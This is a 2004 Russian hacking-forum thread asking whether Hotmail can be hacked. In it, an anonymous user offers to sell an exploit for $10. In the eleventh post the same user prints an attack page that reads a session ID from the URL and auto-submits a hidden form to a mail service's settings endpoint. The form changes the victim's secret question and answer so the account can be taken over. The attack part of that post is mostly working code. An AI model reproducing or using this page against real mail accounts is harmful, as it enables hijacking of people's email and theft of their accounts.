Ломается ли хотмайл?

Discussion in 'Уязвимости Mail-сервисов' started by lol, 11 Oct 2004.

  1. lol

    lol New Member

    Joined:
    4 Oct 2004
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Напишите пожалста, можно ли ломануть хотмайл.ком ? Или он особенный?
     
  2. susanin

    susanin New Member

    Joined:
    23 Oct 2003
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    *** сколько можно говорить... не сломаешь ты хотмаил, если и есть спсобы то только приватные..  [​IMG]
     
  3. Guest

    Guest Guest

    Reputations:
    0
    Есть! Надо только головой подумать.... Кстати все написано на antichate [​IMG]
     
  4. salop

    salop New Member

    Joined:
    10 Oct 2004
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    угу и чтоже там написано? что позваляет хотмыло сломать лол
     
  5. Guest

    Guest Guest

    Reputations:
    0
    Сейчас пишу скрипт... проблема с substr. КТо шарит в js стукните мне 5895544.
    За ранее... [​IMG]
     
  6. Guest

    Guest Guest

    Reputations:
    0
    Все! 2-а дня мучений и эксплойт готов. Експлойт пока работает только с веб интерфейсом. То есть юзер должен проверять ящик именно через веб интерфейс.Работает все так что при открытие письма, выполняется js, который меняет нужные данные, и дает нам пароль.  Продам эксплойт за каких то 10$.... стучите в 5895544...
    Щас работаю над тем чтобы скрипт пахал через любое почт. программу. (the bat, аутлук и тд)....


    Вообщето я ни чего продавать не хотел, но просто очень ща деньги нужны [​IMG]
     
  7. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,049
    Likes Received:
    29
    Reputations:
    8
    shine, ну не смеши ...
     
  8. Guest

    Guest Guest

    Reputations:
    0
    2чегевара: Всмысле?
     
  9. salop

    salop New Member

    Joined:
    10 Oct 2004
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    интерестно как ты смог изменить нужные данные если там везде нужно указать первоночальный пароль ? [​IMG]
     
  10. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,049
    Likes Received:
    29
    Reputations:
    8
    Во-первых, я не считаю, что там есть xss, которое изменяет какие-либо параметры .. Это было бы слишком просто ...
    Во-вторых, я так и непонял, что ты хотел сказать имея ввиду работу скрипта через почтовую программу ...
    Я могу ошибаться, но по-моему это развод ...
     
  11. Guest

    Guest Guest

    Reputations:
    0
    Да это развод, только явно не вас. Есть 2-е формы секретный вопрос и секретный ответ... Есть форма настроек данных и есть поле маил. На все эти формы пароль не требуется[​IMG]
    Под почтовый клиент, естественно js может и не пахать(например в бате), поэтому придется крепить html'ку. Это конечно пока толька идеи, но мне кажется что ид-ешник получится вытащить из хистори(так как в почтовом клиенте больше ее вы тащить не откуда). Для особо не верущих этот код:

    <html>
    <script&gt;
    var stroka=location+'#';
    var sid=stroka.substr(98,32);

    &lt;/script&gt;
    &lt;form &nbsp; method=&quot;POST&quot; name=&quot;forma&quot;&gt;
    &nbsp; &nbsp;&lt;INPUT type=&quot;hidden&quot; name=&quot;session_id&quot;&gt;
    &nbsp; &nbsp;&lt;INPUT type=&quot;hidden&quot; value=&quot;1&quot; name=&quot;cp_msg&quot;&gt;
    &nbsp; &nbsp;&lt;INPUT type=&quot;hidden&quot; value=&quot;1&quot; name=&quot;__post&quot;&gt;
    &nbsp; &nbsp;&lt;INPUT type=&quot;hidden&quot; name=&quot;cp_quest&quot; value=&quot;Ни рыба, ни мясо?и не курица тоже[​IMG]&quot;&gt;
    &nbsp; &nbsp;&lt;INPUT type=&quot;hidden&quot; name=&quot;cp_answ&quot; &nbsp;value=&quot;321123&quot;&gt;
    &nbsp; &nbsp;&lt;INPUT type=&quot;hidden&quot; method=&quot;POST&quot; value=&quot;Внести изменения&quot;&gt;
    &nbsp;&lt;/form&gt;
    <script&gt;
    forma.action=&quot;http://www4.nm.ru/users/chpass.dhtml?session_id=&quot;+sid;
    forma.session_id.value=sid;
    document.forma.submit()
    &lt;/script&gt;
    &lt;/html&gt;

    Этот js меняет лишь секретный вопрос и ответ...
    з.ы. Скрипт работает только в прикрепленном файле с именем &quot;Ready exploit for hotmail.ru.html&quot;. Сами понимаите измените имя фаила, изменится локатион. Скрипт работает только вод веб-интерфейсом

    Это так сказать тестовая версия[​IMG] За полной обращайтесь в фсб[​IMG])
     
  12. Technocrat

    Technocrat New Member

    Joined:
    9 Oct 2004
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    странно, может багу пофиксили уже, но месяц назад просто скрытым фреймом мне удалось сменить секретный вопрос и ответ на праре ящиков...
     
  13. salop

    salop New Member

    Joined:
    10 Oct 2004
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Парень лол , разговор ващето идт о hotmail.com гыгы
     
  14. Technocrat

    Technocrat New Member

    Joined:
    9 Oct 2004
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (salop @ октября 17 2004,19:49)</td></tr><tr><td id="QUOTE">Парень лол , разговор ващето идт о hotmail.com гыгы[/QUOTE]<span id='postcolor'>
    мдя... если про .com речь, то имхо оч. сложно... SSL какникак... да и фиксят поди всё вовремя
     
  15. Guest

    Guest Guest

    Reputations:
    0
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (salop @ октября 17 2004,19:49)</td></tr><tr><td id="QUOTE">Парень лол , разговор ващето идт о hotmail.com гыгы[/QUOTE]<span id='postcolor'>
    Бля не заметил[​IMG] (Во что пиво с людьми делает[​IMG]) НУ и пох.... короче если кому експлойт под хотмеил.РУ нужон, стучите[​IMG] [​IMG]
     
  16. De1eT

    De1eT пиздюк

    Joined:
    12 Aug 2004
    Messages:
    377
    Likes Received:
    71
    Reputations:
    55
    Тут значит разводят флейм )))Круто ))я попал на пастбище